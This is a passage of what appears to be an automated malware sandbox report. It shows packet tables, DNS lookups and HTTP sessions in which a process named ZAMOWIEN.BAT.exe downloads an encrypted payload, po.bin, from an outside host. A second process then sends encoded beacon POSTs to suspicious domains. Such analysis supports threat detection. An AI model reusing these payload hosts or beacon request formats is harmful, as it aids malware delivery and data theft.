Dec 2, 2024 07:09:46.137406111 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.137449980 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.139384985 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.139455080 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.139492989 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.139554977 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.141465902 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.141520977 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.141740084 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.141788960 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.143452883 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.143516064 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.143528938 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.143573046 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.145504951 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.145565987 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.145612955 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.145654917 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:50.321964979 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:50.322040081 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:10:16.289025068 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:10:26.910912037 CET	49803	80	192.168.2.4	195.110.124.133
Dec 2, 2024 07:10:27.030925035 CET	80	49803	195.110.124.133	192.168.2.4
Dec 2, 2024 07:10:27.031023026 CET	49803	80	192.168.2.4	195.110.124.133
Dec 2, 2024 07:10:27.039174080 CET	49803	80	192.168.2.4	195.110.124.133
Dec 2, 2024 07:10:27.159131050 CET	80	49803	195.110.124.133	192.168.2.4
Dec 2, 2024 07:10:28.386822939 CET	80	49803	195.110.124.133	192.168.2.4
Dec 2, 2024 07:10:28.387056112 CET	80	49803	195.110.124.133	192.168.2.4
Dec 2, 2024 07:10:28.387140036 CET	49803	80	192.168.2.4	195.110.124.133
Dec 2, 2024 07:10:28.389794111 CET	49803	80	192.168.2.4	195.110.124.133
Dec 2, 2024 07:10:28.509660006 CET	80	49803	195.110.124.133	192.168.2.4
Dec 2, 2024 07:10:43.860127926 CET	49844	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:43.980083942 CET	80	49844	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:43.980175972 CET	49844	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:44.022880077 CET	49844	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:44.143034935 CET	80	49844	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:45.306675911 CET	80	49844	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:45.307095051 CET	80	49844	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:45.307145119 CET	49844	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:45.532617092 CET	49844	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:46.553901911 CET	49850	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:46.673975945 CET	80	49850	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:46.674047947 CET	49850	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:46.771848917 CET	49850	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:46.891896009 CET	80	49850	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:47.946129084 CET	80	49850	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:47.946528912 CET	80	49850	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:47.946576118 CET	49850	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:48.282650948 CET	49850	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:49.300857067 CET	49856	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:49.420887947 CET	80	49856	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:49.420985937 CET	49856	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:49.529058933 CET	49856	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:49.649059057 CET	80	49856	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:49.649080992 CET	80	49856	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:49.649235964 CET	80	49856	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:49.649245024 CET	80	49856	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:49.649329901 CET	80	49856	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:49.649338961 CET	80	49856	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:49.649420977 CET	80	49856	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:49.649447918 CET	80	49856	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:49.649502039 CET	80	49856	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:50.709623098 CET	80	49856	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:50.710979939 CET	80	49856	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:50.711038113 CET	49856	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:51.048269987 CET	49856	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:52.069145918 CET	49865	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:52.189125061 CET	80	49865	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:52.189198017 CET	49865	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:52.202168941 CET	49865	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:52.322361946 CET	80	49865	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:53.419974089 CET	80	49865	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:53.420316935 CET	80	49865	172.67.145.234	192.168.2.4
Dec 2, 2024 07:10:53.421937943 CET	49865	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:53.422719002 CET	49865	80	192.168.2.4	172.67.145.234
Dec 2, 2024 07:10:53.542572975 CET	80	49865	172.67.145.234	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2024 07:09:42.719012022 CET	57014	53	192.168.2.4	1.1.1.1
Dec 2, 2024 07:09:43.614579916 CET	53	57014	1.1.1.1	192.168.2.4
Dec 2, 2024 07:10:26.073539972 CET	50361	53	192.168.2.4	1.1.1.1
Dec 2, 2024 07:10:26.904671907 CET	53	50361	1.1.1.1	192.168.2.4
Dec 2, 2024 07:10:43.543360949 CET	64540	53	192.168.2.4	1.1.1.1
Dec 2, 2024 07:10:43.852806091 CET	53	64540	1.1.1.1	192.168.2.4
Dec 2, 2024 07:10:58.692756891 CET	50610	53	192.168.2.4	1.1.1.1
Dec 2, 2024 07:10:59.126282930 CET	53	50610	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 2, 2024 07:09:42.719012022 CET	192.168.2.4	1.1.1.1	0x6676	Standard query (0)	ectasia.sa.com	A (IP address)	IN (0x0001)	false
Dec 2, 2024 07:10:26.073539972 CET	192.168.2.4	1.1.1.1	0x77a	Standard query (0)	www.officinadelpasso.shop	A (IP address)	IN (0x0001)	false
Dec 2, 2024 07:10:43.543360949 CET	192.168.2.4	1.1.1.1	0xe255	Standard query (0)	www.vayui.top	A (IP address)	IN (0x0001)	false
Dec 2, 2024 07:10:58.692756891 CET	192.168.2.4	1.1.1.1	0x9ef6	Standard query (0)	www.tals.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 2, 2024 07:09:43.614579916 CET	1.1.1.1	192.168.2.4	0x6676	No error (0)	ectasia.sa.com		103.83.194.50	A (IP address)	IN (0x0001)	false
Dec 2, 2024 07:10:26.904671907 CET	1.1.1.1	192.168.2.4	0x77a	No error (0)	www.officinadelpasso.shop	officinadelpasso.shop		CNAME (Canonical name)	IN (0x0001)	false
Dec 2, 2024 07:10:26.904671907 CET	1.1.1.1	192.168.2.4	0x77a	No error (0)	officinadelpasso.shop		195.110.124.133	A (IP address)	IN (0x0001)	false
Dec 2, 2024 07:10:43.852806091 CET	1.1.1.1	192.168.2.4	0xe255	No error (0)	www.vayui.top		172.67.145.234	A (IP address)	IN (0x0001)	false
Dec 2, 2024 07:10:43.852806091 CET	1.1.1.1	192.168.2.4	0xe255	No error (0)	www.vayui.top		104.21.95.160	A (IP address)	IN (0x0001)	false
Dec 2, 2024 07:10:59.126282930 CET	1.1.1.1	192.168.2.4	0x9ef6	No error (0)	www.tals.xyz		13.248.169.48	A (IP address)	IN (0x0001)	false
Dec 2, 2024 07:10:59.126282930 CET	1.1.1.1	192.168.2.4	0x9ef6	No error (0)	www.tals.xyz		76.223.54.146	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ectasia.sa.com

www.officinadelpasso.shop

www.vayui.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	103.83.194.50	80	8036	C:\Users\user\Desktop\ZAMOWIEN.BAT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 07:09:43.741488934 CET	165	OUT	GET /po.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: ectasia.sa.com Cache-Control: no-cache
Dec 2, 2024 07:09:45.075445890 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 06:09:44 GMT Server: Apache Last-Modified: Mon, 02 Dec 2024 03:11:45 GMT Accept-Ranges: bytes Content-Length: 289856 Content-Type: application/octet-stream Data Raw: e8 e1 39 6b 8a 1c 2e 29 56 4c 74 9a a0 a7 41 1c 22 a6 40 47 1d 04 83 3a 58 c2 03 12 9b 42 ac 60 6f bd 90 04 55 11 af af e9 d0 33 b0 37 f5 d9 74 ea 85 30 27 be e4 99 79 5e 60 ec 31 ce 7c d1 e8 90 40 de 86 c1 e8 85 4c 8c 81 01 87 a0 9c ea 7c 45 05 cb a7 d1 a7 3d 8e 08 af 8a 62 0b 95 cf 96 11 ca c7 c5 02 99 2c 92 e0 1f cd 8b 38 a0 96 8e 3e 4b ea 26 05 ee 28 55 49 9e dd 8b 05 54 3e 9b 7f 33 77 47 de 3c fd ee 80 b4 f5 9a 42 f5 59 c4 89 83 d1 46 fd 15 bf 7e af bd 60 05 8d 8a 76 1f e3 2b 3c 3f 55 99 1e 91 ce 2d e7 be e8 34 42 63 e6 fe 8b 03 fd 5a 2a 41 87 75 34 ad f0 68 9e d1 62 81 11 29 40 52 0c f4 4b de b1 a6 e1 45 b5 39 f5 ea 0c aa a0 6e 24 26 3b b3 2c b9 b4 a0 9e 7c 46 4b 8c e8 09 07 2a ae ab 68 37 68 39 5e 70 d9 34 70 53 f4 36 e9 09 b4 09 ef a1 41 3a 84 72 3e 61 30 4f ab e5 38 d9 fa 60 8f 7a 37 41 aa e6 39 a8 66 51 fc 77 46 c4 6d 69 ed f0 b9 5a 5a 34 07 c8 8e 07 a4 50 96 c3 bd 26 12 8a c3 20 71 0d 50 69 3a 87 2c c6 5f b7 89 1d d7 87 7b ee 67 90 b7 d5 21 9b 88 3b e6 fa 3b 62 6e ee ce 02 a6 e3 2c 61 14 [TRUNCATED] Data Ascii: 9k.)VLtA"@G:XB`oU37t0'y^`1\|@L\|E=b,8>K&(UIT>3wG<BYF~`v+<?U-4BcZAu4hb)@RKE9n$&;,\|FKh7h9^p4pS6A:r>a0O8`z7A9fQwFmiZZ4P& qPi:,_{g!;;bn,a_:av7D3Cei'BO#2d2C(zR1N)8#Y+4I)+P3EJ$bg8(@0\W#7 /Dl\|FQY/n^vTmB+7w<.O=M#p``bglc1dV(6pz[d6EPZQg~dy=$Vp/]R%V'Bf0ms@p\g^9< ~eF$B[s>Z#,Bok1=U`V+qq`80f+o8,zNaBn+&HeduHS@ok&Ra!yO>~`e<o):-6%n?4=gCTn8}DU>)c~v \|B}KOx/6LoMHMI{e\>n}Cf7ZN rO/5/ [TRUNCATED]
Dec 2, 2024 07:09:45.075645924 CET	1236	IN	Data Raw: c2 61 9c a9 d6 8b fa 5c b2 5e 1d a4 58 63 32 4a d3 f8 ba 0a 10 e3 88 1f 74 54 23 82 bb 92 46 19 ec 73 a3 ee dc 7e d1 67 60 2a 1a 0e 01 b1 75 e3 ed c8 35 b3 c9 18 08 71 11 c4 cf f9 7c 53 fa 73 9a dd 1a 4e 86 c2 e8 85 4c 88 81 01 87 5f 63 ea 7c fd Data Ascii: a\^Xc2JtT#Fs~g`u5q\|SsNL_c\|=Hb,8>K&(UIT>q,I#6z@fp^ZukD{CfW'Ku4h}2kvU%LYC!J\'5gM]T>4p
Dec 2, 2024 07:09:45.075656891 CET	1236	IN	Data Raw: d6 55 dc 25 d2 ca ef 4c a4 59 9a 0e 43 d5 21 15 86 4a 88 c0 f9 8f 5c ed 27 1b 35 67 4d 5d f9 01 54 00 04 3e 17 2a 34 70 53 f4 36 e9 09 b4 59 aa a1 41 76 85 73 3e 66 91 63 cb e5 38 d9 fa 60 8f 7a 37 a1 aa e4 38 a3 67 5a fc 77 1c c0 6d 69 ed f0 b9 Data Ascii: U%LYC!J\'5gM]T>4pS6YAvs>fc8`z78gZwmiZZ4P&b qMPi,]{g!;;b,a_r:av7D#Cei'BO#2d2C(zR1N)8#Y+4I)+P3EJ$
Dec 2, 2024 07:09:45.075669050 CET	1236	IN	Data Raw: 80 29 d9 1d 38 d7 23 d9 ce fd dc 59 c0 2b fc 34 cc 49 99 29 2b 88 f5 d0 50 33 9e 06 ea 45 4a 8a e8 f3 87 ff 02 24 89 1a bb 0e 62 da 67 96 38 be 13 28 b5 af 40 fa fe 89 b3 b2 dd b4 a3 30 5c 15 57 89 aa 23 37 20 2a ab de 2f 44 dc 11 6c af ad fe 86 Data Ascii: )8#Y+4I)+P3EJ$bg8(@0\W#7 */Dl\|FQY/}n^v5Rq3w<.O=M#p@`bglc1dV(6pz[d6EPZQg~dy=$Vp/]R%V'Bf0ms@p\g^9< ~eF
Dec 2, 2024 07:09:45.075695992 CET	1236	IN	Data Raw: ce b6 cc 94 a7 b8 c4 07 e9 f9 3c e0 56 aa 46 ed 72 ef 6e 13 01 0a 88 dd d5 23 75 8a 47 98 c5 2b ec d6 1e 8e 2a 69 87 24 3b 41 dd d0 31 fe ff ed e7 f6 a6 5b 51 79 d8 f5 1e f9 03 7b 7a 5b 61 ff b1 60 c6 cc b3 ba 78 67 be a6 68 dc 3a dc 91 55 e6 82 Data Ascii: <VFrn#uG+i$;A1[Qy{z[a`xgh:UXq3e0TRk=MZ+q]Jvn6_(JylzB0@E0^Jl:(dz8D\P4nGP<d_TzPhE;=k']q>y4g@u[V"9
Dec 2, 2024 07:09:45.075709105 CET	1236	IN	Data Raw: 66 aa f7 32 4c 9b d4 e2 15 e2 1a 2d 22 63 b0 89 77 02 bc ce 4d cb e8 25 ec 45 c5 41 34 bc 4c 2a 3a c5 bf f9 fc 33 78 ce b1 85 4f 5b 9b 05 aa 53 59 e0 95 97 fb 3e fa e4 04 fa cc f9 b9 13 38 d2 3e b9 b2 ac 0f 3f e5 8a bf 16 c9 00 87 06 c2 34 61 5c Data Ascii: f2L-"cwM%EA4L*:3xO[SY>8>?4a\nvf%<W~)=i!a{p<.DK,MaY/gE1<lCfpRdU%ccZWKK;.\9}2C5s`_h+/,xCe
Dec 2, 2024 07:09:45.075721979 CET	1236	IN	Data Raw: 1f 9d c4 c6 f7 3d d1 b2 f3 20 37 c7 ce bc 54 e9 24 07 87 a9 4f d7 d6 8b 73 19 76 d7 58 48 9f 26 f2 d3 c5 f8 ba 83 55 13 01 5a cc 93 66 32 17 a1 46 19 2b 36 0b 13 c0 7e d1 a0 25 8a a5 43 01 b1 b2 a6 75 83 5f b3 c9 91 4d e1 28 81 c7 f6 f8 ff fd 73 Data Ascii: = 7T$OsvXH&UZf2F+6~%Cu_M(sVOBsgEZEIZm","8K&wUI,v7Y0#='\|7xGGd+`\_D6{t)*wPrW1("d V!ZSz^\ct
Dec 2, 2024 07:09:45.075896025 CET	1236	IN	Data Raw: ee 77 34 ad 7b 35 56 54 c0 f4 03 62 7e bf 22 07 ce 53 6a de 9b d2 39 0b 15 4a 2f 83 5b e5 5c d6 fb 60 6b c3 d5 08 72 da 98 6c dd 43 08 67 4d 20 ea b9 03 3d 04 3e 3c e8 f5 98 50 79 22 2b 8a 76 51 23 f4 85 fd d0 9f bf 9c 5f 3c cb e5 45 c7 6a 22 04 Data Ascii: w4{5VTb~"Sj9J/[\`krlCgM =><Py"+vQ#_<Ej"bhqC4}u!) ~]+,MwF(^$+aM/a2G!=AaD5P"E^)TLI> T+3d4R8Fe;#YYWl
Dec 2, 2024 07:09:45.075952053 CET	1236	IN	Data Raw: eb 73 27 91 6e bb 7d 47 c5 9e 54 42 90 36 10 6a 62 07 39 82 e8 1d 38 84 75 8e fd 26 ef a6 f3 dd c5 69 c0 46 1d 4a 29 88 f5 e9 0d 23 eb 0f d3 18 52 85 6c a6 85 ff 02 9d 70 58 bb 0e da df fb 34 b4 49 fa 2b 64 6e ba fd 75 43 72 5b c2 b7 69 45 b7 aa Data Ascii: s'n}GTB6jb98u&iFJ)#RlpX4I+dnuCr[iE#*/iZG4xlFq%Yn^R_}GBJvN7gs`%g)EA$EIzOod\6Ez3h\|D%w'l(Ce
Dec 2, 2024 07:09:45.075963974 CET	1236	IN	Data Raw: 66 19 3f d8 e7 09 87 12 b3 bc 9a 5b f9 36 a4 18 5e a0 4b 22 e6 78 87 42 88 3c 15 e3 27 d1 87 e6 4e f1 f6 89 04 47 ec fa e6 1b 87 0e 13 7d ed e1 69 7b 32 49 28 8c be a8 8c b9 c9 c9 5a 57 73 3e 0f 26 81 ce 56 93 66 e3 9b 5f 73 76 a8 f0 4c d3 fd 32 Data Ascii: f?[6^K"xB<'NG}i{2I(ZWs>&Vf_svL2h3C"UVf]8?P97o:cXX8[nrTO\|&Gl7sp}\|@`G!W{2'\|3wl=u&k*3g\|d6\|Q+wj0<y4=CGsn])T_
Dec 2, 2024 07:09:45.195900917 CET	1236	IN	Data Raw: a4 01 da 11 a5 66 ad c9 c7 23 b6 65 00 3c e2 78 29 3a 99 fa 1c 73 2b 94 98 c8 e0 6d 12 6c ea cd b8 36 01 e1 04 f7 7d 5e 83 d2 02 3c 94 e8 15 64 7a 2a f4 3c c6 7e d0 57 2c c8 41 bd aa 5d 6b 55 d9 c8 82 b0 a0 73 8f a1 65 ec 80 2d 66 17 5a fb f9 3c Data Ascii: f#e<x):s+ml6}^<dz<~W,A]kUse-fZ<~LgZSK]uwPUlto4>uBmI>2]/26C^ $c+i!;>Ypj{}N&a4:YQN6O/(ce/FA,(cV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49803	195.110.124.133	80	3448	C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 07:10:27.039174080 CET	472	OUT	GET /vlg0/?WPjx20M=qomJeF/TtZ0QUZ/lu9XGw5rEDKlC0VH3n7TxRqREffWgONqaapTJswa8a+ti36YSjfwaEcz7GfWHOzY8D/KxwVpCEXfXsdPRTHALBjA15rmVzjOLWJp7K7s=&bxJPx=a6h4-FrPGbkpc HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.officinadelpasso.shop Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Dec 2, 2024 07:10:28.386822939 CET	367	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 06:10:28 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 6c 67 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vlg0/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49844	172.67.145.234	80	3448	C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 07:10:44.022880077 CET	711	OUT	POST /4twy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Host: www.vayui.top Origin: http://www.vayui.top Referer: http://www.vayui.top/4twy/ Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0 Data Raw: 57 50 6a 78 32 30 4d 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 78 39 72 38 66 73 62 6d 7a 32 4f 38 69 4d 43 57 46 50 57 4d 78 43 6a 49 6e 6b 36 6d 67 66 6a 48 6c 72 69 50 6d 41 63 33 58 34 73 55 46 69 39 69 48 79 79 67 79 72 4f 45 48 2f 54 4f 58 43 45 4c 41 34 2b 2f 4f 64 58 46 48 64 49 39 6a 53 79 6f 45 79 35 38 62 35 77 75 31 54 57 6d 2f 45 71 53 37 49 4b 63 69 72 54 35 66 57 49 33 75 66 4a 47 4a 43 61 54 39 59 31 6e 68 73 35 6a 46 6f 51 57 34 65 6e 6e 68 62 63 7a 6f 4e 4f 37 78 69 64 6b 73 6e 4e 35 54 48 59 48 68 58 6d 30 4a 39 35 46 73 55 50 67 57 45 45 6d 71 6c 6d 4f 56 49 72 31 64 71 4d 43 32 51 3d 3d Data Ascii: WPjx20M=rDqkmhD2LOnTx9r8fsbmz2O8iMCWFPWMxCjInk6mgfjHlriPmAc3X4sUFi9iHyygyrOEH/TOXCELA4+/OdXFHdI9jSyoEy58b5wu1TWm/EqS7IKcirT5fWI3ufJGJCaT9Y1nhs5jFoQW4ennhbczoNO7xidksnN5THYHhXm0J95FsUPgWEEmqlmOVIr1dqMC2Q==
Dec 2, 2024 07:10:45.306675911 CET	908	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 06:10:45 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fbDtQFdH5vqzgzxEqH9Up%2BQph0L4%2FNCHYnHPeq6fKeK9wVHQR%2FbZ0K3I5uPKJL3eveHE8KTU0TMnW8K3kZ5%2BjT1VOo287VtkcncTTqJ7KwOxQrPQgma7ZwJj2RmpzNDv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eb927d74c620f60-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1486&rtt_var=743&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=711&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49850	172.67.145.234	80	3448	C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 07:10:46.771848917 CET	731	OUT	POST /4twy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Host: www.vayui.top Origin: http://www.vayui.top Referer: http://www.vayui.top/4twy/ Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 224 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0 Data Raw: 57 50 6a 78 32 30 4d 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 6a 73 62 38 64 50 44 6d 30 57 4f 37 2b 63 43 57 4c 76 57 49 78 43 66 49 6e 67 6a 68 68 74 33 48 6b 4f 47 50 30 56 6f 33 51 34 73 55 4e 43 39 6e 59 69 7a 73 79 72 43 69 48 36 37 4f 58 43 51 4c 41 34 4f 2f 4f 71 37 43 47 4e 49 2f 6c 53 79 75 5a 43 35 38 62 35 77 75 31 51 72 44 2f 45 79 53 37 34 61 63 6a 4a 37 36 44 47 49 77 76 66 4a 47 4e 43 61 58 39 59 31 4a 68 75 64 64 46 72 6f 57 34 62 4c 6e 68 4b 63 77 69 4e 4f 39 76 53 63 74 73 31 56 30 55 48 42 4b 6e 31 50 56 55 73 52 32 74 53 43 36 48 31 6c 78 34 6c 43 39 49 50 69 42 51 70 78 4c 74 56 72 55 54 57 43 44 4c 44 71 4f 36 59 64 35 73 4a 37 69 45 44 41 3d Data Ascii: WPjx20M=rDqkmhD2LOnTjsb8dPDm0WO7+cCWLvWIxCfIngjhht3HkOGP0Vo3Q4sUNC9nYizsyrCiH67OXCQLA4O/Oq7CGNI/lSyuZC58b5wu1QrD/EyS74acjJ76DGIwvfJGNCaX9Y1JhuddFroW4bLnhKcwiNO9vScts1V0UHBKn1PVUsR2tSC6H1lx4lC9IPiBQpxLtVrUTWCDLDqO6Yd5sJ7iEDA=
Dec 2, 2024 07:10:47.946129084 CET	908	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 06:10:47 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oEIWy2cbIzmxwlo7Ub5u%2FFjh%2BfUS0lr3QbBfQVKN2LmUOD8bwtfkJMCD3JoWp6W%2FscuaPV8Ted2jeQ17w0UTbuGHRReF%2FGHRgoHRtrZnSisO0kYmCsOvgM4JI1r9TVH9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eb927e7be114294-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1713&rtt_var=856&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=731&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 